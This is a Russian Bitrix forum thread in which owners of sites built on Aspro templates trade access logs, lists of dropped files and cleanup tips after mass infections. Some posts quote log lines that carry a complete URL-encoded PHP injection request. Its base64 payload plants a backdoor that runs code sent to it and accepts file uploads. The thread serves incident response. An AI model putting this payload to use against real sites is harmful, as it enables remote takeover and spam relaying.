Разработчикам

Форум

Заражение сайтов

Заглянувший

Сообщений: 7 Регистрация: 19.02.2025

#131

19.02.2025 11:41:30

Цитата
написал: У меня на аспро оптимус ночью все сайты заразили, после патча аспро, залили мусор в папку ajax, есть решения у того кто на хосте ?

Пока через блокировки по примерам выше, и не забудь проверить cron и процессы в памяти, если ты не почистил их после заражения ранее - они могли снова подложить гадости, у меня был почищен крон и заменён на запуск гадостей, плюс пара процессов висела в памяти, и спамила почту

Пользователь 2784769 Заглянувший Сообщений: 21 Баллов: 2 Регистрация: 27.12.2018	#132 0 19.02.2025 13:05:51 На хосте нет такой возможности просто, да пропатчен, лог буду смотреть

Пользователь 2784769

Заглянувший

Сообщений: 21 Баллов: 2 Регистрация: 27.12.2018

#133

19.02.2025 16:17:35

Вот лог

crystallux.store 82.117.87.97 - - [04/Feb/2025:22:41:05 +0300] "GET / HTTP/1.0" 200 149876 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.40 Safari/537.36"
crystallux.store 82.117.87.97 - - [04/Feb/2025:22:41:16 +0300] "POST /ajax/show_basket_fly.php HTTP/1.0" 500 687 "/"; "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.40 Safari/537.36"
crystallux.store 82.117.87.97 - - [04/Feb/2025:22:41:17 +0300] "POST /ajax/show_basket_popup.php HTTP/1.0" 500 686 "/ajax/show_basket_fly.php"; "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.40 Safari/537.36"
crystallux.store 82.117.87.97 - - [04/Feb/2025:22:41:17 +0300] "POST /ajax/reload_basket_fly.php HTTP/1.0" 500 661 "/ajax/show_basket_popup.php"; "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.40 Safari/537.36"
crystallux.store 82.117.87.97 - - [04/Feb/2025:22:41:17 +0300] "GET /ajax/87b2cf6b52c5.php HTTP/1.0" 200 7 "ajax/reload_basket_fly.php"; "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2751.40 Safari/537.36"

Пользователь 52753

Заглянувший

Сообщений: 21 Баллов: 2 Регистрация: 19.11.2009

#134

20.02.2025 15:02:14

Код

150.241.91.213 - - [17/Feb/2025:09:56:46 +0300] "GET /ajax/js_error.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E HTTP/1.0" 404 140738 "/ajax/error_log_logic.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36"
150.241.91.213 - - [17/Feb/2025:09:56:46 +0300] "GET /ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt HTTP/1.0" 200 2 "/ajax/js_error.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36"
150.241.91.213 - - [17/Feb/2025:09:56:48 +0300] "GET /form/index.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt HTTP/1.0" 200 135417 "/ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36"
15

кто может разобраться что делает код который получается.. и как понять какие файлы заразились? Обнаружил кучу файлов разных и в cron вирус и демон был даже...

Пользователь 8788352

Заглянувший

Сообщений: 7 Регистрация: 19.02.2025

#135

21.02.2025 12:44:32

Цитата

написал:

Код

  150.241  .91  .213  - - [ 17 /Feb/ 2025 : 09 : 56 : 46  + 0300 ]  "GET /ajax/js_error.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E HTTP/1.0"   404   140738   "/ajax/error_log_logic.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E"   "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36" 
 150.241  .91  .213  - - [ 17 /Feb/ 2025 : 09 : 56 : 46  + 0300 ]  "GET /ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt HTTP/1.0"   200   2   "/ajax/js_error.php?data=%3C?php%20file_put_contents($_SERVER[%22DOCUMENT_ROOT%22].%22/f4381c28a0cd.php%22,base64_decode(%22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K%22));unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22);?%3E"   "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36" 
 150.241  .91  .213  - - [ 17 /Feb/ 2025 : 09 : 56 : 48  + 0300 ]  "GET /form/index.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt HTTP/1.0"   200   135417   "/ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt"   "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2956.10 Safari/537.36" 
 15

Это почтовый релей, то есть через твой сервак спамят почту(так было у меня), теоретически можно вынуть всё что есть на сайте. Что касается, что заражено - это куча мусора в папке ajax, и куча левых папок и файлов в корне вот такого вида:

Код

       ajax/0975b4980d19.php
       ajax/09c17daeec38.php
       ajax/0fe189a1c3a8.php
       ajax/11f2648d91.php
       ajax/11f2648d91.txt
       ajax/2f6a68972f99.php
       ajax/3e53017f0661.php
       ajax/46794d9aa7.php
      ajax/46794d9aa7.txt
       ajax/47ae8a62035e.php
       ajax/4fc96c350414.php
       ajax/531ddd873d1c.php
       ajax/939555288f.php
      ajax/a1fc920f04da.php
      ajax/a915da88fc.php
      ajax/f41dbf9792c7.php
       ajax/php.ini

Там же может валяться и php.ini, который тюнингует параметры php под трояна
Лучше всего, если на хостинге есть, закинуть каталог под git, так всегда будешь в курсе изменений, а пока - смотри по дате изменения, запускай поиск файлов созданных после фиксации взлома в логах. ищи по маске php, txt так найдёшь всё свежее
И начни с index.php в корне, там вставлен в начале код трояна

Пользователь 381188

Постоянный посетитель

Сообщений: 159 Баллов: 28 Регистрация: 17.09.2015

#136

21.02.2025 18:36:58

Цитата
Антон Иванов написал: Логи смотрели?Через какой файл прошло заражение? Он был пропатчен?

Можно больше не молиться на так называемый патч от аСПРО.

На только что установленном сайте вот это уже было прописано:

Цитата
Если у вас вместо unserialize используется Solution::unserialize() или CMax::unserialize, то ничего добавлять не нужно. Эти методы уже содержат правку. То есть у вас установлено обновление, устраняющее эту уязвимость.

Итого через пару дней пошло заражение. - файлы типа ***7ea***6eb.php в аджакс папке.
Т.е. дырища где-то в другом месте. И почему эта дырища в свежекупленном в 2024-2025г шаблоне от аСПРО, поражает но не удивляет.

Пользователь 381188

Постоянный посетитель

Сообщений: 159 Баллов: 28 Регистрация: 17.09.2015

#137

21.02.2025 18:38:49

Цитата
Максим Егоров написал: У нас такой список файлов

папки assets Нет в шаблоне, сносите ее всю.

Пользователь 1942587 Заглянувший Сообщений: 1 Регистрация: 18.04.2018	#138 0 22.02.2025 12:09:51 https://www.1c-bitrix.ru/products/cms/security/aspro/ https://aspro.ru/news/vzlomy-saytov-aspro/ https://aspro.ru/kb/article/777/

Пользователь 4345922

Заглянувший

Сообщений: 23 Баллов: 2 Регистрация: 15.06.2020

#139

25.02.2025 16:13:23

Товарищи, подскажите, после лечения сайт работает нормально, но не отображается каталог!
На главной товары есть, в разделах - пусто.
Кэш чистил в первую очередь.
Что это может быть??

Кто пишет, что произошло повторное заражение после установки патча - ищите по датам изменения php файлы, злоумышленники кучу бэкдоров/веб-шеллов оставляют. Где только не нашел! Плюс две задачи в cron добавлены были.

Пользователь 4345922 Заглянувший Сообщений: 23 Баллов: 2 Регистрация: 15.06.2020	#140 0 25.02.2025 16:20:20 Извиняюсь, вопрос решён. Проблема была с .htaccess (наоставляли в каждой папке - грохнул в спешке все, включая тот, что был в корне). Теперь переживаю, нет ли где еще "нужных" .htaccess, которые удалил

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером